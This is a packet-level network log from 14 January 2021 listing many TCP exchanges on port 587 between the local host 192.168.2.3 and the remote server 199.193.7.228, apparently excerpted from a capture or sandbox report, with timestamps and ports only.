Jan 14, 2021 08:01:31.895394087 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.922717094 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:31.923202038 CET	49803	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:32.113468885 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:32.114401102 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:32.119749069 CET	49803	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:32.119961977 CET	49803	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:32.120151043 CET	49803	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:32.120316982 CET	49803	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:32.120507956 CET	49803	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:32.120656967 CET	49803	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:32.120788097 CET	49803	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:32.120919943 CET	49803	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:32.310086966 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:32.310107946 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:32.310638905 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:32.310704947 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:32.310743093 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:32.310966015 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:32.310978889 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:32.329874039 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:32.332942963 CET	49803	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:32.523206949 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:32.524271011 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:32.524337053 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:32.524436951 CET	49803	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:32.525178909 CET	49803	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:32.715398073 CET	587	49803	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:32.814342976 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:32.816098928 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:32.816184044 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:33.004206896 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:33.006189108 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:33.006217003 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:33.006833076 CET	587	49800	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:33.007112026 CET	49800	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:33.049757957 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:34.071777105 CET	49804	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:34.215146065 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:34.265048981 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:34.265157938 CET	49804	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:34.405086994 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:34.405116081 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:34.405263901 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:34.456821918 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:34.457135916 CET	49804	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:34.647979975 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:34.649202108 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:34.649521112 CET	49804	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:34.840327024 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:34.840384007 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:34.841542959 CET	49804	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:35.030225039 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:35.030251026 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:35.031768084 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:35.031793118 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:35.031856060 CET	49804	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:35.035255909 CET	49804	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:35.036334038 CET	49804	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:35.225466013 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:35.225492954 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:35.226470947 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:35.226922989 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:35.227669954 CET	49804	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:35.417896032 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:35.418782949 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:35.419920921 CET	49804	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:35.610090971 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:35.618007898 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:35.618679047 CET	49804	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:35.808860064 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:35.811527014 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:35.812547922 CET	49804	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:36.002784014 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:36.021956921 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:36.022552967 CET	49804	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:36.212824106 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:36.214576006 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:36.215531111 CET	49804	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:36.215569019 CET	49804	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:36.215816021 CET	49804	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:36.215831041 CET	49804	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:36.216007948 CET	49804	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:36.216228008 CET	49804	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:36.216238976 CET	49804	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:36.216528893 CET	49804	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:36.398174047 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:36.406811953 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:36.406836033 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:36.407092094 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:36.407105923 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:36.407377005 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:36.407388926 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:36.407635927 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:36.434781075 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:36.485901117 CET	49804	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:36.588207960 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:36.588573933 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:36.620174885 CET	49804	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:36.642188072 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:36.810475111 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:36.811491013 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:36.811517954 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:36.811605930 CET	49804	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:36.812376976 CET	49804	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:37.002566099 CET	587	49804	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:37.386857033 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:37.577024937 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:37.578363895 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:37.626646042 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:38.509397984 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:38.700072050 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:38.700299025 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:38.893692970 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:38.894042969 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:39.084269047 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:39.085583925 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:39.085908890 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:39.187753916 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:39.276056051 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:39.276851892 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:39.377763033 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:39.380108118 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:39.423671007 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:39.467047930 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:39.467130899 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:39.467159986 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:39.467408895 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:39.469685078 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:39.469712019 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:39.659919024 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:39.659951925 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:39.660515070 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:39.661067963 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:39.851222992 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:39.852555990 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:39.854315042 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:40.044655085 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:40.048144102 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:40.049148083 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:40.239341974 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:40.241657972 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:40.242217064 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:40.432341099 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:40.455743074 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:40.456137896 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:40.471012115 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:40.646272898 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:40.646979094 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:40.647679090 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:40.647958040 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:40.648088932 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:40.648475885 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:40.661040068 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:40.661685944 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:40.705014944 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:40.837820053 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:40.837940931 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:40.838089943 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:40.838576078 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:41.004822016 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:41.033443928 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:41.194765091 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:41.220674038 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:41.223850012 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:41.224884033 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:41.224900007 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:41.224997044 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:41.242608070 CET	49801	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:41.268423080 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:41.353734970 CET	49806	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:41.433044910 CET	587	49801	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:41.521488905 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:41.544487000 CET	587	49806	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:41.545178890 CET	49806	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:41.712508917 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:41.715029955 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:41.736498117 CET	587	49806	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:41.737001896 CET	49806	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:41.812868118 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:41.813226938 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:41.905325890 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:41.905354977 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:41.905478954 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:41.905524015 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:41.927238941 CET	587	49806	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:41.927407980 CET	587	49806	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:41.927922010 CET	49806	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.003592968 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.003704071 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.096457958 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.096498013 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.096661091 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.096726894 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.118094921 CET	587	49806	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.118972063 CET	49806	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.193921089 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.194252968 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.286912918 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.286948919 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.286973953 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.287189007 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.287249088 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.287338972 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.287908077 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.309308052 CET	587	49806	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.309331894 CET	587	49806	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.309423923 CET	49806	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.310524940 CET	49806	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.311408043 CET	49806	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.384438038 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.384465933 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.384592056 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.419118881 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.477682114 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.478060007 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.478077888 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.478092909 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.478106022 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.478133917 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.478281021 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.478605032 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.478620052 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.478629112 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.478645086 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.478725910 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.478758097 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.479008913 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.479022980 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.479121923 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.479334116 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.479346037 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.479461908 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.500792980 CET	587	49806	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.500823975 CET	587	49806	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.501517057 CET	587	49806	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.501912117 CET	587	49806	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.502589941 CET	49806	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.574749947 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.574780941 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.574851036 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.575012922 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.575396061 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.609025955 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.609508991 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.658265114 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.668260098 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.668282032 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.668353081 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.668421030 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.668493986 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.668504953 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.668509960 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.668584108 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.668632984 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.669174910 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.669306040 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.669488907 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.669549942 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.669646025 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.669822931 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.692821980 CET	587	49806	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.694190979 CET	587	49806	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.705741882 CET	49806	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.765479088 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.765630007 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.765872002 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.766465902 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.858647108 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.858740091 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.859352112 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.859364986 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.859432936 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.859493017 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.859674931 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.859688997 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.859771013 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.859817028 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.859898090 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.860136032 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.896044970 CET	587	49806	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.898873091 CET	587	49806	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.899832010 CET	49806	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.955826044 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.955845118 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.956082106 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:42.956572056 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:42.956641912 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.049649954 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.049686909 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.049856901 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.049861908 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.049877882 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.050048113 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.050106049 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.050241947 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.050308943 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.050324917 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.050489902 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.090003967 CET	587	49806	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.098929882 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.099581003 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.100595951 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.101106882 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.101422071 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.101988077 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.102237940 CET	587	49806	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.104954958 CET	49806	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.105133057 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.146311998 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.146783113 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.146972895 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.240102053 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.240122080 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.240428925 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.240621090 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.240726948 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.240739107 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.240751028 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.240771055 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.240922928 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.241547108 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.241832972 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.241885900 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.248475075 CET	49807	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.292036057 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.292061090 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.292072058 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.292203903 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.294936895 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.295125961 CET	587	49806	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.295327902 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.337116003 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.337135077 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.337146997 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.337189913 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.337235928 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.341592073 CET	587	49806	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.342063904 CET	49806	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.367574930 CET	49808	587	192.168.2.3	199.193.7.228
